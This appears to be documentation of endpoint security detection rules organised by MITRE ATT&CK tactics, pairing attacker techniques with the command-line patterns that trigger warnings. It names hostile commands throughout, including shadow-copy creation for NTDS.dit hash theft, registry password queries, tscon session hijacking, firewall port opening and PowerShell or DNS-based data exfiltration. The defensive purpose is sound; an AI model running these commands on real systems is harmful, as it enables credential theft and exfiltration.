This rule fires when HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\ is referenced in command-line arguments. The Warn action fires on detection.

Modifying Group Policy Objects (GPOs) can affect all machines in the domain simultaneously, enabling attackers to push malicious configurations to every endpoint.

This rule fires when New-GPOImmediateTask is detected in command-line arguments, or when the Local Group Policy Editor or Group Policy Management MMC snap-in is opened. The Warn action fires on detection.

This policy covers MITRE ATT&CK Tactic TA0005 (Defense Evasion), covering techniques used to avoid detection and analysis. Rules monitor firewall manipulation, signed binary proxy execution, email hiding, and indirect command execution methods.

The HARDRAIN malware opens specific firewall ports to enable its proxy C2 communications. Detecting this specific firewall rule addition is a high-confidence indicator of HARDRAIN infection.

This rule fires when the exact netsh advfirewall firewall add rule name="atomic testing" action=allow dir=in protocol=TCP localport=450 command is detected. The Warn action fires immediately.

pcalua.exe (Program Compatibility Assistant) can be used to execute arbitrary programs as a signed Windows binary, bypassing application whitelisting rules that block direct execution.

This rule fires when pcalua.exe -a is detected in command-line arguments. The Warn action fires on detection.

rundll32.exe syssetup.dll executes a legitimate-looking DLL call that can be used to proxy the execution of arbitrary code through a signed Windows binary.

This rule fires when rundll32.exe syssetup.dll is detected in command-line arguments. The Warn action fires on detection.

Attackers who gain access to an email account often create inbox rules to silently delete or redirect security-relevant emails, preventing the victim from seeing alerts or anomaly reports.

This rule fires when New-InboxRule or Set-InboxRule are detected in command-line arguments. The Warn action fires on detection.

mshta.exe can execute inline JavaScript via the javascript: URI scheme, allowing attackers to use a trusted Windows binary to load and execute remote malicious content.

This rule fires when mshta.exe javascript:a= is detected in command-line arguments. The Warn action fires on detection.

This policy covers MITRE ATT&CK Tactic TA0006 (Credential Access), covering techniques used to steal credentials. Rules detect credential dumping tools, browser password access, network sniffing, and insecure credential storage.

Creating a Volume Shadow Copy via WMI provides a read-consistent snapshot of the NTDS.dit database, enabling offline extraction of all Active Directory password hashes.

This rule fires when wmic shadowcopy call create Volume= is detected in command-line arguments. The Warn action fires immediately.

Accessing browser-stored passwords, whether through the Chrome Settings/Passwords page, Firefox Logins & Passwords, or direct access to the Chrome Login Data SQLite database, is a common credential harvesting technique.

This rule fires when Chrome is navigated to Settings - Passwords, when the Chrome Login Data file path is accessed via command line, or when Firefox shows the Logins & Passwords window. The Warn action fires on detection.

Running Wireshark or tshark on a corporate network captures plaintext credentials and sensitive data from unencrypted network traffic.

This rule fires when the tshark.exe command is executed with a capture interface argument, or when wireshark.exe is launched. The Warn action fires on detection.

gsecdump.exe is a credential extraction tool that dumps password hashes and Kerberos tickets from Windows memory.

This rule fires when gsecdump.exe -a is detected in command-line arguments or when gsecdump.exe is launched. The Warn action fires on detection.

Querying the registry for password values is a common technique for finding credentials left by administrators, installers, or applications in insecure locations.

This rule fires when reg query HKLM /f password, reg query HKCU /f password, or various PowerShell credential extraction cmdlets (Get-UnattendedInstallFile, Get-Webconfig, Get-CachedGPPPassword, etc.) are detected. The Warn action fires on detection.

Credentials pasted into Notepad and stored in plain text files represent a common, low-tech security failure that must be detected and discouraged.

This rule fires when clipboard content containing "Username" or "Password" is pasted into notepad.exe. The Warn action fires on detection.

This policy covers MITRE ATT&CK Tactic TA0007 (Discovery), covering techniques used by adversaries to gain knowledge about the target system and network. Rules detect reconnaissance commands, system enumeration, and Active Directory discovery activity.

netstat and net use provide a comprehensive view of active network connections. Adversaries use this information to identify interesting targets, data repositories, and C2 channels already established.

This rule fires when netstat or net use are detected in command-line arguments. The Warn action fires on detection.

systeminfo, hostname, winver, and related commands reveal the operating system version, patch level, hardware configuration, and installed software, all of which inform the attacker's choice of exploits.

This rule fires when systeminfo.exe, winver, systeminfo, hostname, GetComputerName, net config workstation, or date /t are detected in command-line arguments. The Warn action fires on detection.

Querying the domain Administrator account details reveals password policy, account status, and group memberships, helping attackers prioritize their credential theft targets.

This rule fires when net user administrator /domain is detected from the command line. The Warn action fires on detection.

Enumerating cloud group memberships reveals which users have access to cloud resources, informing the attacker's targeting of privileged cloud accounts.

This rule fires when Get-MsolRole, az ad user get-member-groups, or GetBucketAcl are detected in command-line arguments. The Warn action fires on detection.

Browser bookmarks often reveal internal application URLs, development portals, and administrative interfaces that may not be otherwise discoverable.

This rule fires when Firefox profile bookmark paths or Chrome bookmark pages are accessed via command line or browser navigation. The Warn action fires on detection.

File and directory enumeration commands (dir, ls, tree, find, Get-ChildItem) are used to map the file system, locate sensitive data, and identify targets for exfiltration.

This rule fires when these enumeration commands are detected in command-line arguments. The Warn action fires on detection.

This policy covers MITRE ATT&CK Tactic TA0008 (Lateral Movement), covering techniques used by adversaries to move through the network and gain access to additional systems.

Transferring tools between systems using psexec or certutil is a fundamental lateral movement technique that stages attack tools on new targets before executing them.

This rule fires when psexec, cerutil, PsExec64, or PsExec are detected in command-line arguments. The Warn action fires on detection.

Evil-WinRM is an attacker-focused WinRM shell designed to provide a feature-rich offensive interface to Windows machines via WinRM.

This rule fires when evil-winrm -i is detected in command-line arguments. The Warn action fires on detection.

Radmin is a legitimate remote administration tool that can be used by attackers as an alternative to common remote access tools that may be blocked or monitored.

This rule fires when any application with radmin in its name is launched. The Warn action fires on detection.

WinRM (winrm) provides a legitimate but powerful remote management channel. Its invocation from the command line may indicate an attacker establishing a remote interactive shell.

This rule fires when winrm is detected in command-line arguments. The Warn action fires on detection.

Hijacking an existing RDP session using the tscon command allows an attacker to silently take over another user's logged-in session without needing their credentials.

This rule fires when query user, sc.exe create sesshijack binpath= "cmd.exe /k tscon", or net start sesshijack are detected in command-line arguments. The Warn action fires on detection.

Using net use, PsExec, or similar tools to connect to Windows administrative shares (ADMIN$, C$, IPC$) is a classic lateral movement technique.

This rule fires when net use, psexec, psexec64, PsExec, or PsExec64 are detected in command-line arguments. The Warn action fires on detection.

The cmd.exe /c net use command specifically maps a remote administrative share, providing access to the file system of another machine using the current user's credentials.

This rule fires when cmd.exe /c net use is detected in command-line arguments. The Warn action fires on detection.

This policy covers MITRE ATT&CK Tactic TA0009 (Collection), covering techniques used to gather data relevant to the adversary's goals before exfiltration.

Screen capture via PrintScreen keys, Snipping Tool, or the Problem Steps Recorder (psr.exe) is used by attackers to collect sensitive information displayed on screen without creating persistent files.

This rule fires when PrtScr/Shift+PrtScr keystrokes are detected, when SnippingTool.exe or ScreenSketch.exe is launched, or when psr.exe /start is detected in command-line arguments. The Warn action fires on detection.

Copying Outlook PST or OST files provides a complete offline copy of the victim's email, calendar, and contacts, a high-value target for business intelligence exfiltration.

This rule fires when Copy operations targeting Outlook file paths (\Documents\Outlook Files or \AppData\Local\Microsoft\Outlook) are detected, or when commands like copy c:\Users\\backup.pst or Get-Inbox.ps1 are detected. The Warn action fires on detection.

dir /b /s and findstr /e commands are used to enumerate files and search for specific content across the file system, the first step in automated collection of targeted data.

This rule fires when dir c: /b /s or findstr /e are detected in command-line arguments. The Warn action fires on detection.

VBA macros can programmatically access and exfiltrate clipboard contents, capturing sensitive data that a user may have copied for a different purpose.

This rule fires when PowerShell commands associated with VBA-driven clipboard collection are detected, including Set-Clipboard -value, Invoke-Maldoc -macroFile, and -sub "GetClipboard". The Warn action fires on detection.

Compressing collected files into archives (ZIP, 7-Zip, WinRAR) is a standard data staging step before exfiltration, reducing size and making content harder to inspect.

This rule fires when a Write, Copy, or Rename operation is detected while zip.exe, 7zip.exe, or similar archiving utilities are active. The Warn action fires on detection.

This policy covers MITRE ATT&CK Tactic TA0010 (Exfiltration), covering techniques used to steal data from the network. Rules detect web-based exfiltration, physical medium transfers, protocol-based data transfer, and C2 channel exfiltration.

Using git to commit and push sensitive files to a code repository is a common technique for both accidental and intentional data disclosure, particularly relevant for developer-heavy environments.

This rule fires once per day when git.exe is used with git add, git commit -m, or git pull commands from the command line. The Warn action fires to create an audit record.

Using FTP, SMTP, or curl to transfer files to arbitrary servers bypasses standard HTTPS-based DLP controls. These protocols may be unmonitored and therefore preferred by attackers.

This rule fires when file Write or Copy operations to network shares are detected, or when Upload operations using FTP, SMTP, Outlook, or curl --upload-file/curl -X POST are performed. The Warn action fires once per day.

Syncing files to cloud storage clients (OneDrive, Dropbox, Google Drive, Box) or copying files from such clients can represent covert data exfiltration using trusted, whitelisted services.

This rule fires when Write operations target a cloud client destination (Any) or when Copy operations originate from a cloud client source. The Warn action fires on detection.

Invoke-DNSExfiltrator encodes data within DNS queries to exfiltrate it over UDP/53, a protocol that is rarely blocked or inspected in enterprise networks.

This rule fires when Invoke-DNSExfiltrator -i is detected in command-line arguments. The Warn action fires immediately.

Using PowerShell's Invoke-WebRequest with POST data to send file contents to a remote URL is a simple but effective way to exfiltrate data through the existing C2 channel.

This rule fires when Invoke-WebRequest -Uri with -Method POST -Body arguments, or $filecontent = Get-Content -Path followed by web request commands, are detected. The Warn action fires on detection.

Copying the specific thumb.dd file to an external drive is associated with USB-based data collection tools that create disk images for offline analysis.

This rule fires when Access or Write operations targeting thumb.dd on %EXTERNALDRIVES% (excluding drive R:) are detected. The Warn action fires on detection.

ConfigSecurityPolicy.exe (a Windows Defender binary) can be abused as a Living Off the Land Binary (LOLBin) to exfiltrate data to a remote location while appearing to be legitimate security software activity.

This rule fires when commands locating and executing ConfigSecurityPolicy.exe with an XML file argument are detected. The Warn action fires on detection.

The IcedID botnet uses HTTP PUT requests to automatically exfiltrate collected data back to its C2 server. This rule detects the specific PowerShell pattern used for this operation.

This rule fires when $contentType = "application/octet-stream" combined with Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName is detected in command-line arguments. The Warn action fires immediately.